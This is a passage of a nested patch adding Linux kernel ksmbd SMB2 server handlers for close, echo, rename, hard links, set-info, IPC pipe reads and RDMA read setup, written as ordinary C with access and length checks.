++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_SECURITY\n");
++		rc = smb2_get_info_sec(work, req, rsp);
++		break;
++	default:
++		ksmbd_debug(SMB, "InfoType %d not supported yet\n",
++			    req->InfoType);
++		rc = -EOPNOTSUPP;
++	}
++
++	if (rc < 0) {
++		if (rc == -EACCES)
++			rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		else if (rc == -ENOENT)
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++		else if (rc == -EIO)
++			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++		else if (rc == -EOPNOTSUPP || rsp->hdr.Status == 0)
++			rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
++		smb2_set_err_rsp(work);
++
++		ksmbd_debug(SMB, "error while processing smb2 query rc = %d\n",
++			    rc);
++		return rc;
++	}
++	rsp->StructureSize = cpu_to_le16(9);
++	rsp->OutputBufferOffset = cpu_to_le16(72);
++	inc_rfc1001_len(work->response_buf, 8);
++	return 0;
++}
++
++/**
++ * smb2_close_pipe() - handler for closing IPC pipe
++ * @work:	smb work containing close request buffer
++ *
++ * Return:	0
++ */
++static noinline int smb2_close_pipe(struct ksmbd_work *work)
++{
++	u64 id;
++	struct smb2_close_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_close_rsp *rsp = smb2_get_msg(work->response_buf);
++
++	id = req->VolatileFileId;
++	ksmbd_session_rpc_close(work->sess, id);
++
++	rsp->StructureSize = cpu_to_le16(60);
++	rsp->Flags = 0;
++	rsp->Reserved = 0;
++	rsp->CreationTime = 0;
++	rsp->LastAccessTime = 0;
++	rsp->LastWriteTime = 0;
++	rsp->ChangeTime = 0;
++	rsp->AllocationSize = 0;
++	rsp->EndOfFile = 0;
++	rsp->Attributes = 0;
++	inc_rfc1001_len(work->response_buf, 60);
++	return 0;
++}
++
++/**
++ * smb2_close() - handler for smb2 close file command
++ * @work:	smb work containing close request buffer
++ *
++ * Return:	0
++ */
++int smb2_close(struct ksmbd_work *work)
++{
++	u64 volatile_id = KSMBD_NO_FID;
++	u64 sess_id;
++	struct smb2_close_req *req;
++	struct smb2_close_rsp *rsp;
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_file *fp;
++	struct inode *inode;
++	u64 time;
++	int err = 0;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC pipe close request\n");
++		return smb2_close_pipe(work);
++	}
++
++	sess_id = le64_to_cpu(req->hdr.SessionId);
++	if (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)
++		sess_id = work->compound_sid;
++
++	work->compound_sid = 0;
++	if (check_session_id(conn, sess_id)) {
++		work->compound_sid = sess_id;
++	} else {
++		rsp->hdr.Status = STATUS_USER_SESSION_DELETED;
++		if (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		err = -EBADF;
++		goto out;
++	}
++
++	if (work->next_smb2_rcv_hdr_off &&
++	    !has_file_id(req->VolatileFileId)) {
++		if (!has_file_id(work->compound_fid)) {
++			/* file already closed, return FILE_CLOSED */
++			ksmbd_debug(SMB, "file already closed\n");
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++			err = -EBADF;
++			goto out;
++		} else {
++			ksmbd_debug(SMB,
++				    "Compound request set FID = %llu:%llu\n",
++				    work->compound_fid,
++				    work->compound_pfid);
++			volatile_id = work->compound_fid;
++
++			/* file closed, stored id is not valid anymore */
++			work->compound_fid = KSMBD_NO_FID;
++			work->compound_pfid = KSMBD_NO_FID;
++		}
++	} else {
++		volatile_id = req->VolatileFileId;
++	}
++	ksmbd_debug(SMB, "volatile_id = %llu\n", volatile_id);
++
++	rsp->StructureSize = cpu_to_le16(60);
++	rsp->Reserved = 0;
++
++	if (req->Flags == SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB) {
++		fp = ksmbd_lookup_fd_fast(work, volatile_id);
++		if (!fp) {
++			err = -ENOENT;
++			goto out;
++		}
++
++		inode = file_inode(fp->filp);
++		rsp->Flags = SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB;
++		rsp->AllocationSize = S_ISDIR(inode->i_mode) ? 0 :
++			cpu_to_le64(inode->i_blocks << 9);
++		rsp->EndOfFile = cpu_to_le64(inode->i_size);
++		rsp->Attributes = fp->f_ci->m_fattr;
++		rsp->CreationTime = cpu_to_le64(fp->create_time);
++		time = ksmbd_UnixTimeToNT(inode->i_atime);
++		rsp->LastAccessTime = cpu_to_le64(time);
++		time = ksmbd_UnixTimeToNT(inode->i_mtime);
++		rsp->LastWriteTime = cpu_to_le64(time);
++		time = ksmbd_UnixTimeToNT(inode->i_ctime);
++		rsp->ChangeTime = cpu_to_le64(time);
++		ksmbd_fd_put(work, fp);
++	} else {
++		rsp->Flags = 0;
++		rsp->AllocationSize = 0;
++		rsp->EndOfFile = 0;
++		rsp->Attributes = 0;
++		rsp->CreationTime = 0;
++		rsp->LastAccessTime = 0;
++		rsp->LastWriteTime = 0;
++		rsp->ChangeTime = 0;
++	}
++
++	err = ksmbd_close_fd(work, volatile_id);
++out:
++	if (err) {
++		if (rsp->hdr.Status == 0)
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++		smb2_set_err_rsp(work);
++	} else {
++		inc_rfc1001_len(work->response_buf, 60);
++	}
++
++	return 0;
++}
++
++/**
++ * smb2_echo() - handler for smb2 echo(ping) command
++ * @work:	smb work containing echo request buffer
++ *
++ * Return:	0
++ */
++int smb2_echo(struct ksmbd_work *work)
++{
++	struct smb2_echo_rsp *rsp = smb2_get_msg(work->response_buf);
++
++	rsp->StructureSize = cpu_to_le16(4);
++	rsp->Reserved = 0;
++	inc_rfc1001_len(work->response_buf, 4);
++	return 0;
++}
++
++static int smb2_rename(struct ksmbd_work *work,
++		       struct ksmbd_file *fp,
++		       struct user_namespace *user_ns,
++		       struct smb2_file_rename_info *file_info,
++		       struct nls_table *local_nls)
++{
++	struct ksmbd_share_config *share = fp->tcon->share_conf;
++	char *new_name = NULL, *abs_oldname = NULL, *old_name = NULL;
++	char *pathname = NULL;
++	struct path path;
++	bool file_present = true;
++	int rc;
++
++	ksmbd_debug(SMB, "setting FILE_RENAME_INFO\n");
++	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
++	if (!pathname)
++		return -ENOMEM;
++
++	abs_oldname = file_path(fp->filp, pathname, PATH_MAX);
++	if (IS_ERR(abs_oldname)) {
++		rc = -EINVAL;
++		goto out;
++	}
++	old_name = strrchr(abs_oldname, '/');
++	if (old_name && old_name[1] != '\0') {
++		old_name++;
++	} else {
++		ksmbd_debug(SMB, "can't get last component in path %s\n",
++			    abs_oldname);
++		rc = -ENOENT;
++		goto out;
++	}
++
++	new_name = smb2_get_name(file_info->FileName,
++				 le32_to_cpu(file_info->FileNameLength),
++				 local_nls);
++	if (IS_ERR(new_name)) {
++		rc = PTR_ERR(new_name);
++		goto out;
++	}
++
++	if (strchr(new_name, ':')) {
++		int s_type;
++		char *xattr_stream_name, *stream_name = NULL;
++		size_t xattr_stream_size;
++		int len;
++
++		rc = parse_stream_name(new_name, &stream_name, &s_type);
++		if (rc < 0)
++			goto out;
++
++		len = strlen(new_name);
++		if (len > 0 && new_name[len - 1] != '/') {
++			pr_err("not allow base filename in rename\n");
++			rc = -ESHARE;
++			goto out;
++		}
++
++		rc = ksmbd_vfs_xattr_stream_name(stream_name,
++						 &xattr_stream_name,
++						 &xattr_stream_size,
++						 s_type);
++		if (rc)
++			goto out;
++
++		rc = ksmbd_vfs_setxattr(user_ns,
++					fp->filp->f_path.dentry,
++					xattr_stream_name,
++					NULL, 0, 0);
++		if (rc < 0) {
++			pr_err("failed to store stream name in xattr: %d\n",
++			       rc);
++			rc = -EINVAL;
++			goto out;
++		}
++
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "new name %s\n", new_name);
++	rc = ksmbd_vfs_kern_path(work, new_name, LOOKUP_NO_SYMLINKS, &path, 1);
++	if (rc) {
++		if (rc != -ENOENT)
++			goto out;
++		file_present = false;
++	} else {
++		path_put(&path);
++	}
++
++	if (ksmbd_share_veto_filename(share, new_name)) {
++		rc = -ENOENT;
++		ksmbd_debug(SMB, "Can't rename vetoed file: %s\n", new_name);
++		goto out;
++	}
++
++	if (file_info->ReplaceIfExists) {
++		if (file_present) {
++			rc = ksmbd_vfs_remove_file(work, new_name);
++			if (rc) {
++				if (rc != -ENOTEMPTY)
++					rc = -EINVAL;
++				ksmbd_debug(SMB, "cannot delete %s, rc %d\n",
++					    new_name, rc);
++				goto out;
++			}
++		}
++	} else {
++		if (file_present &&
++		    strncmp(old_name, path.dentry->d_name.name, strlen(old_name))) {
++			rc = -EEXIST;
++			ksmbd_debug(SMB,
++				    "cannot rename already existing file\n");
++			goto out;
++		}
++	}
++
++	rc = ksmbd_vfs_fp_rename(work, fp, new_name);
++out:
++	kfree(pathname);
++	if (!IS_ERR(new_name))
++		kfree(new_name);
++	return rc;
++}
++
++static int smb2_create_link(struct ksmbd_work *work,
++			    struct ksmbd_share_config *share,
++			    struct smb2_file_link_info *file_info,
++			    unsigned int buf_len, struct file *filp,
++			    struct nls_table *local_nls)
++{
++	char *link_name = NULL, *target_name = NULL, *pathname = NULL;
++	struct path path;
++	bool file_present = true;
++	int rc;
++
++	if (buf_len < (u64)sizeof(struct smb2_file_link_info) +
++			le32_to_cpu(file_info->FileNameLength))
++		return -EINVAL;
++
++	ksmbd_debug(SMB, "setting FILE_LINK_INFORMATION\n");
++	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
++	if (!pathname)
++		return -ENOMEM;
++
++	link_name = smb2_get_name(file_info->FileName,
++				  le32_to_cpu(file_info->FileNameLength),
++				  local_nls);
++	if (IS_ERR(link_name) || S_ISDIR(file_inode(filp)->i_mode)) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "link name is %s\n", link_name);
++	target_name = file_path(filp, pathname, PATH_MAX);
++	if (IS_ERR(target_name)) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "target name is %s\n", target_name);
++	rc = ksmbd_vfs_kern_path(work, link_name, LOOKUP_NO_SYMLINKS, &path, 0);
++	if (rc) {
++		if (rc != -ENOENT)
++			goto out;
++		file_present = false;
++	} else {
++		path_put(&path);
++	}
++
++	if (file_info->ReplaceIfExists) {
++		if (file_present) {
++			rc = ksmbd_vfs_remove_file(work, link_name);
++			if (rc) {
++				rc = -EINVAL;
++				ksmbd_debug(SMB, "cannot delete %s\n",
++					    link_name);
++				goto out;
++			}
++		}
++	} else {
++		if (file_present) {
++			rc = -EEXIST;
++			ksmbd_debug(SMB, "link already exists\n");
++			goto out;
++		}
++	}
++
++	rc = ksmbd_vfs_link(work, target_name, link_name);
++	if (rc)
++		rc = -EINVAL;
++out:
++	if (!IS_ERR(link_name))
++		kfree(link_name);
++	kfree(pathname);
++	return rc;
++}
++
++static int set_file_basic_info(struct ksmbd_file *fp,
++			       struct smb2_file_basic_info *file_info,
++			       struct ksmbd_share_config *share)
++{
++	struct iattr attrs;
++	struct file *filp;
++	struct inode *inode;
++	struct user_namespace *user_ns;
++	int rc = 0;
++
++	if (!(fp->daccess & FILE_WRITE_ATTRIBUTES_LE))
++		return -EACCES;
++
++	attrs.ia_valid = 0;
++	filp = fp->filp;
++	inode = file_inode(filp);
++	user_ns = file_mnt_user_ns(filp);
++
++	if (file_info->CreationTime)
++		fp->create_time = le64_to_cpu(file_info->CreationTime);
++
++	if (file_info->LastAccessTime) {
++		attrs.ia_atime = ksmbd_NTtimeToUnix(file_info->LastAccessTime);
++		attrs.ia_valid |= (ATTR_ATIME | ATTR_ATIME_SET);
++	}
++
++	attrs.ia_valid |= ATTR_CTIME;
++	if (file_info->ChangeTime)
++		attrs.ia_ctime = ksmbd_NTtimeToUnix(file_info->ChangeTime);
++	else
++		attrs.ia_ctime = inode->i_ctime;
++
++	if (file_info->LastWriteTime) {
++		attrs.ia_mtime = ksmbd_NTtimeToUnix(file_info->LastWriteTime);
++		attrs.ia_valid |= (ATTR_MTIME | ATTR_MTIME_SET);
++	}
++
++	if (file_info->Attributes) {
++		if (!S_ISDIR(inode->i_mode) &&
++		    file_info->Attributes & FILE_ATTRIBUTE_DIRECTORY_LE) {
++			pr_err("can't change a file to a directory\n");
++			return -EINVAL;
++		}
++
++		if (!(S_ISDIR(inode->i_mode) && file_info->Attributes == FILE_ATTRIBUTE_NORMAL_LE))
++			fp->f_ci->m_fattr = file_info->Attributes |
++				(fp->f_ci->m_fattr & FILE_ATTRIBUTE_DIRECTORY_LE);
++	}
++
++	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_STORE_DOS_ATTRS) &&
++	    (file_info->CreationTime || file_info->Attributes)) {
++		struct xattr_dos_attrib da = {0};
++
++		da.version = 4;
++		da.itime = fp->itime;
++		da.create_time = fp->create_time;
++		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
++		da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
++			XATTR_DOSINFO_ITIME;
++
++		rc = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
++						    filp->f_path.dentry, &da);
++		if (rc)
++			ksmbd_debug(SMB,
++				    "failed to restore file attribute in EA\n");
++		rc = 0;
++	}
++
++	if (attrs.ia_valid) {
++		struct dentry *dentry = filp->f_path.dentry;
++		struct inode *inode = d_inode(dentry);
++
++		if (IS_IMMUTABLE(inode) || IS_APPEND(inode))
++			return -EACCES;
++
++		inode_lock(inode);
++		inode->i_ctime = attrs.ia_ctime;
++		attrs.ia_valid &= ~ATTR_CTIME;
++		rc = notify_change(user_ns, dentry, &attrs, NULL);
++		inode_unlock(inode);
++	}
++	return rc;
++}
++
++static int set_file_allocation_info(struct ksmbd_work *work,
++				    struct ksmbd_file *fp,
++				    struct smb2_file_alloc_info *file_alloc_info)
++{
++	/*
++	 * TODO : It's working fine only when store dos attributes
++	 * is not yes. need to implement a logic which works
++	 * properly with any smb.conf option
++	 */
++
++	loff_t alloc_blks;
++	struct inode *inode;
++	int rc;
++
++	if (!(fp->daccess & FILE_WRITE_DATA_LE))
++		return -EACCES;
++
++	alloc_blks = (le64_to_cpu(file_alloc_info->AllocationSize) + 511) >> 9;
++	inode = file_inode(fp->filp);
++
++	if (alloc_blks > inode->i_blocks) {
++		smb_break_all_levII_oplock(work, fp, 1);
++		rc = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
++				   alloc_blks * 512);
++		if (rc && rc != -EOPNOTSUPP) {
++			pr_err("vfs_fallocate is failed : %d\n", rc);
++			return rc;
++		}
++	} else if (alloc_blks < inode->i_blocks) {
++		loff_t size;
++
++		/*
++		 * Allocation size could be smaller than original one
++		 * which means allocated blocks in file should be
++		 * deallocated. use truncate to cut out it, but inode
++		 * size is also updated with truncate offset.
++		 * inode size is retained by backup inode size.
++		 */
++		size = i_size_read(inode);
++		rc = ksmbd_vfs_truncate(work, fp, alloc_blks * 512);
++		if (rc) {
++			pr_err("truncate failed!, err %d\n", rc);
++			return rc;
++		}
++		if (size < alloc_blks * 512)
++			i_size_write(inode, size);
++	}
++	return 0;
++}
++
++static int set_end_of_file_info(struct ksmbd_work *work, struct ksmbd_file *fp,
++				struct smb2_file_eof_info *file_eof_info)
++{
++	loff_t newsize;
++	struct inode *inode;
++	int rc;
++
++	if (!(fp->daccess & FILE_WRITE_DATA_LE))
++		return -EACCES;
++
++	newsize = le64_to_cpu(file_eof_info->EndOfFile);
++	inode = file_inode(fp->filp);
++
++	/*
++	 * If FILE_END_OF_FILE_INFORMATION of set_info_file is called
++	 * on FAT32 shared device, truncate execution time is too long
++	 * and network error could cause from windows client. because
++	 * truncate of some filesystem like FAT32 fill zero data in
++	 * truncated range.
++	 */
++	if (inode->i_sb->s_magic != MSDOS_SUPER_MAGIC) {
++		ksmbd_debug(SMB, "truncated to newsize %lld\n", newsize);
++		rc = ksmbd_vfs_truncate(work, fp, newsize);
++		if (rc) {
++			ksmbd_debug(SMB, "truncate failed!, err %d\n", rc);
++			if (rc != -EAGAIN)
++				rc = -EBADF;
++			return rc;
++		}
++	}
++	return 0;
++}
++
++static int set_rename_info(struct ksmbd_work *work, struct ksmbd_file *fp,
++			   struct smb2_file_rename_info *rename_info,
++			   unsigned int buf_len)
++{
++	struct user_namespace *user_ns;
++	struct ksmbd_file *parent_fp;
++	struct dentry *parent;
++	struct dentry *dentry = fp->filp->f_path.dentry;
++	int ret;
++
++	if (!(fp->daccess & FILE_DELETE_LE)) {
++		pr_err("no right to delete : 0x%x\n", fp->daccess);
++		return -EACCES;
++	}
++
++	if (buf_len < (u64)sizeof(struct smb2_file_rename_info) +
++			le32_to_cpu(rename_info->FileNameLength))
++		return -EINVAL;
++
++	user_ns = file_mnt_user_ns(fp->filp);
++	if (ksmbd_stream_fd(fp))
++		goto next;
++
++	parent = dget_parent(dentry);
++	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
++	if (ret) {
++		dput(parent);
++		return ret;
++	}
++
++	parent_fp = ksmbd_lookup_fd_inode(d_inode(parent));
++	inode_unlock(d_inode(parent));
++	dput(parent);
++
++	if (parent_fp) {
++		if (parent_fp->daccess & FILE_DELETE_LE) {
++			pr_err("parent dir is opened with delete access\n");
++			ksmbd_fd_put(work, parent_fp);
++			return -ESHARE;
++		}
++		ksmbd_fd_put(work, parent_fp);
++	}
++next:
++	return smb2_rename(work, fp, user_ns, rename_info,
++			   work->conn->local_nls);
++}
++
++static int set_file_disposition_info(struct ksmbd_file *fp,
++				     struct smb2_file_disposition_info *file_info)
++{
++	struct inode *inode;
++
++	if (!(fp->daccess & FILE_DELETE_LE)) {
++		pr_err("no right to delete : 0x%x\n", fp->daccess);
++		return -EACCES;
++	}
++
++	inode = file_inode(fp->filp);
++	if (file_info->DeletePending) {
++		if (S_ISDIR(inode->i_mode) &&
++		    ksmbd_vfs_empty_dir(fp) == -ENOTEMPTY)
++			return -EBUSY;
++		ksmbd_set_inode_pending_delete(fp);
++	} else {
++		ksmbd_clear_inode_pending_delete(fp);
++	}
++	return 0;
++}
++
++static int set_file_position_info(struct ksmbd_file *fp,
++				  struct smb2_file_pos_info *file_info)
++{
++	loff_t current_byte_offset;
++	unsigned long sector_size;
++	struct inode *inode;
++
++	inode = file_inode(fp->filp);
++	current_byte_offset = le64_to_cpu(file_info->CurrentByteOffset);
++	sector_size = inode->i_sb->s_blocksize;
++
++	if (current_byte_offset < 0 ||
++	    (fp->coption == FILE_NO_INTERMEDIATE_BUFFERING_LE &&
++	     current_byte_offset & (sector_size - 1))) {
++		pr_err("CurrentByteOffset is not valid : %llu\n",
++		       current_byte_offset);
++		return -EINVAL;
++	}
++
++	fp->filp->f_pos = current_byte_offset;
++	return 0;
++}
++
++static int set_file_mode_info(struct ksmbd_file *fp,
++			      struct smb2_file_mode_info *file_info)
++{
++	__le32 mode;
++
++	mode = file_info->Mode;
++
++	if ((mode & ~FILE_MODE_INFO_MASK)) {
++		pr_err("Mode is not valid : 0x%x\n", le32_to_cpu(mode));
++		return -EINVAL;
++	}
++
++	/*
++	 * TODO : need to implement consideration for
++	 * FILE_SYNCHRONOUS_IO_ALERT and FILE_SYNCHRONOUS_IO_NONALERT
++	 */
++	ksmbd_vfs_set_fadvise(fp->filp, mode);
++	fp->coption = mode;
++	return 0;
++}
++
++/**
++ * smb2_set_info_file() - handler for smb2 set info command
++ * @work:	smb work containing set info command buffer
++ * @fp:		ksmbd_file pointer
++ * @req:	request buffer pointer
++ * @share:	ksmbd_share_config pointer
++ *
++ * Return:	0 on success, otherwise error
++ * TODO: need to implement an error handling for STATUS_INFO_LENGTH_MISMATCH
++ */
++static int smb2_set_info_file(struct ksmbd_work *work, struct ksmbd_file *fp,
++			      struct smb2_set_info_req *req,
++			      struct ksmbd_share_config *share)
++{
++	unsigned int buf_len = le32_to_cpu(req->BufferLength);
++
++	switch (req->FileInfoClass) {
++	case FILE_BASIC_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_basic_info))
++			return -EINVAL;
++
++		return set_file_basic_info(fp, (struct smb2_file_basic_info *)req->Buffer, share);
++	}
++	case FILE_ALLOCATION_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_alloc_info))
++			return -EINVAL;
++
++		return set_file_allocation_info(work, fp,
++						(struct smb2_file_alloc_info *)req->Buffer);
++	}
++	case FILE_END_OF_FILE_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_eof_info))
++			return -EINVAL;
++
++		return set_end_of_file_info(work, fp,
++					    (struct smb2_file_eof_info *)req->Buffer);
++	}
++	case FILE_RENAME_INFORMATION:
++	{
++		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			return -EACCES;
++		}
++
++		if (buf_len < sizeof(struct smb2_file_rename_info))
++			return -EINVAL;
++
++		return set_rename_info(work, fp,
++				       (struct smb2_file_rename_info *)req->Buffer,
++				       buf_len);
++	}
++	case FILE_LINK_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_link_info))
++			return -EINVAL;
++
++		return smb2_create_link(work, work->tcon->share_conf,
++					(struct smb2_file_link_info *)req->Buffer,
++					buf_len, fp->filp,
++					work->conn->local_nls);
++	}
++	case FILE_DISPOSITION_INFORMATION:
++	{
++		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			return -EACCES;
++		}
++
++		if (buf_len < sizeof(struct smb2_file_disposition_info))
++			return -EINVAL;
++
++		return set_file_disposition_info(fp,
++						 (struct smb2_file_disposition_info *)req->Buffer);
++	}
++	case FILE_FULL_EA_INFORMATION:
++	{
++		if (!(fp->daccess & FILE_WRITE_EA_LE)) {
++			pr_err("Not permitted to write ext  attr: 0x%x\n",
++			       fp->daccess);
++			return -EACCES;
++		}
++
++		if (buf_len < sizeof(struct smb2_ea_info))
++			return -EINVAL;
++
++		return smb2_set_ea((struct smb2_ea_info *)req->Buffer,
++				   buf_len, &fp->filp->f_path);
++	}
++	case FILE_POSITION_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_pos_info))
++			return -EINVAL;
++
++		return set_file_position_info(fp, (struct smb2_file_pos_info *)req->Buffer);
++	}
++	case FILE_MODE_INFORMATION:
++	{
++		if (buf_len < sizeof(struct smb2_file_mode_info))
++			return -EINVAL;
++
++		return set_file_mode_info(fp, (struct smb2_file_mode_info *)req->Buffer);
++	}
++	}
++
++	pr_err("Unimplemented Fileinfoclass :%d\n", req->FileInfoClass);
++	return -EOPNOTSUPP;
++}
++
++static int smb2_set_info_sec(struct ksmbd_file *fp, int addition_info,
++			     char *buffer, int buf_len)
++{
++	struct smb_ntsd *pntsd = (struct smb_ntsd *)buffer;
++
++	fp->saccess |= FILE_SHARE_DELETE_LE;
++
++	return set_info_sec(fp->conn, fp->tcon, &fp->filp->f_path, pntsd,
++			buf_len, false);
++}
++
++/**
++ * smb2_set_info() - handler for smb2 set info command handler
++ * @work:	smb work containing set info request buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_set_info(struct ksmbd_work *work)
++{
++	struct smb2_set_info_req *req;
++	struct smb2_set_info_rsp *rsp;
++	struct ksmbd_file *fp;
++	int rc = 0;
++	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
++
++	ksmbd_debug(SMB, "Received set info request\n");
++
++	if (work->next_smb2_rcv_hdr_off) {
++		req = ksmbd_req_buf_next(work);
++		rsp = ksmbd_resp_buf_next(work);
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++				    work->compound_fid);
++			id = work->compound_fid;
++			pid = work->compound_pfid;
++		}
++	} else {
++		req = smb2_get_msg(work->request_buf);
++		rsp = smb2_get_msg(work->response_buf);
++	}
++
++	if (!has_file_id(id)) {
++		id = req->VolatileFileId;
++		pid = req->PersistentFileId;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, id, pid);
++	if (!fp) {
++		ksmbd_debug(SMB, "Invalid id for close: %u\n", id);
++		rc = -ENOENT;
++		goto err_out;
++	}
++
++	switch (req->InfoType) {
++	case SMB2_O_INFO_FILE:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
++		rc = smb2_set_info_file(work, fp, req, work->tcon->share_conf);
++		break;
++	case SMB2_O_INFO_SECURITY:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_SECURITY\n");
++		if (ksmbd_override_fsids(work)) {
++			rc = -ENOMEM;
++			goto err_out;
++		}
++		rc = smb2_set_info_sec(fp,
++				       le32_to_cpu(req->AdditionalInformation),
++				       req->Buffer,
++				       le32_to_cpu(req->BufferLength));
++		ksmbd_revert_fsids(work);
++		break;
++	default:
++		rc = -EOPNOTSUPP;
++	}
++
++	if (rc < 0)
++		goto err_out;
++
++	rsp->StructureSize = cpu_to_le16(2);
++	inc_rfc1001_len(work->response_buf, 2);
++	ksmbd_fd_put(work, fp);
++	return 0;
++
++err_out:
++	if (rc == -EACCES || rc == -EPERM || rc == -EXDEV)
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	else if (rc == -EINVAL)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	else if (rc == -ESHARE)
++		rsp->hdr.Status = STATUS_SHARING_VIOLATION;
++	else if (rc == -ENOENT)
++		rsp->hdr.Status = STATUS_OBJECT_NAME_INVALID;
++	else if (rc == -EBUSY || rc == -ENOTEMPTY)
++		rsp->hdr.Status = STATUS_DIRECTORY_NOT_EMPTY;
++	else if (rc == -EAGAIN)
++		rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
++	else if (rc == -EBADF || rc == -ESTALE)
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++	else if (rc == -EEXIST)
++		rsp->hdr.Status = STATUS_OBJECT_NAME_COLLISION;
++	else if (rsp->hdr.Status == 0 || rc == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
++	smb2_set_err_rsp(work);
++	ksmbd_fd_put(work, fp);
++	ksmbd_debug(SMB, "error while processing smb2 query rc = %d\n", rc);
++	return rc;
++}
++
++/**
++ * smb2_read_pipe() - handler for smb2 read from IPC pipe
++ * @work:	smb work containing read IPC pipe command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++static noinline int smb2_read_pipe(struct ksmbd_work *work)
++{
++	int nbytes = 0, err;
++	u64 id;
++	struct ksmbd_rpc_command *rpc_resp;
++	struct smb2_read_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_read_rsp *rsp = smb2_get_msg(work->response_buf);
++
++	id = req->VolatileFileId;
++
++	inc_rfc1001_len(work->response_buf, 16);
++	rpc_resp = ksmbd_rpc_read(work->sess, id);
++	if (rpc_resp) {
++		if (rpc_resp->flags != KSMBD_RPC_OK) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		work->aux_payload_buf =
++			kvmalloc(rpc_resp->payload_sz, GFP_KERNEL | __GFP_ZERO);
++		if (!work->aux_payload_buf) {
++			err = -ENOMEM;
++			goto out;
++		}
++
++		memcpy(work->aux_payload_buf, rpc_resp->payload,
++		       rpc_resp->payload_sz);
++
++		nbytes = rpc_resp->payload_sz;
++		work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
++		work->aux_payload_sz = nbytes;
++		kvfree(rpc_resp);
++	}
++
++	rsp->StructureSize = cpu_to_le16(17);
++	rsp->DataOffset = 80;
++	rsp->Reserved = 0;
++	rsp->DataLength = cpu_to_le32(nbytes);
++	rsp->DataRemaining = 0;
++	rsp->Flags = 0;
++	inc_rfc1001_len(work->response_buf, nbytes);
++	return 0;
++
++out:
++	rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++	smb2_set_err_rsp(work);
++	kvfree(rpc_resp);
++	return err;
++}
++
++static int smb2_set_remote_key_for_rdma(struct ksmbd_work *work,
++					struct smb2_buffer_desc_v1 *desc,
++					__le32 Channel,
++					__le16 ChannelInfoLength)
++{
++	unsigned int i, ch_count;
++
++	if (work->conn->dialect == SMB30_PROT_ID &&
++	    Channel != SMB2_CHANNEL_RDMA_V1)
++		return -EINVAL;
++
++	ch_count = le16_to_cpu(ChannelInfoLength) / sizeof(*desc);
++	if (ksmbd_debug_types & KSMBD_DEBUG_RDMA) {
++		for (i = 0; i < ch_count; i++) {
++			pr_info("RDMA r/w request %#x: token %#x, length %#x\n",
++				i,
++				le32_to_cpu(desc[i].token),
++				le32_to_cpu(desc[i].length));
++		}
++	}
++	if (!ch_count)
++		return -EINVAL;
++
++	work->need_invalidate_rkey =
++		(Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE);
++	if (Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE)
++		work->remote_key = le32_to_cpu(desc->token);
++	return 0;
++}
++
++static ssize_t smb2_read_rdma_channel(struct ksmbd_work *work,
++				      struct smb2_read_req *req, void *data_buf,
++				      size_t length)
++{
++	int err;
++
++	err = ksmbd_conn_rdma_write(work->conn, data_buf, length,
++				    (struct smb2_buffer_desc_v1 *)
++				    ((char *)req + le16_to_cpu(req->ReadChannelInfoOffset)),
++				    le16_to_cpu(req->ReadChannelInfoLength));
++	if (err)
++		return err;
++
++	return length;
++}
++
++/**
++ * smb2_read() - handler for smb2 read from file
++ * @work:	smb work containing read command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
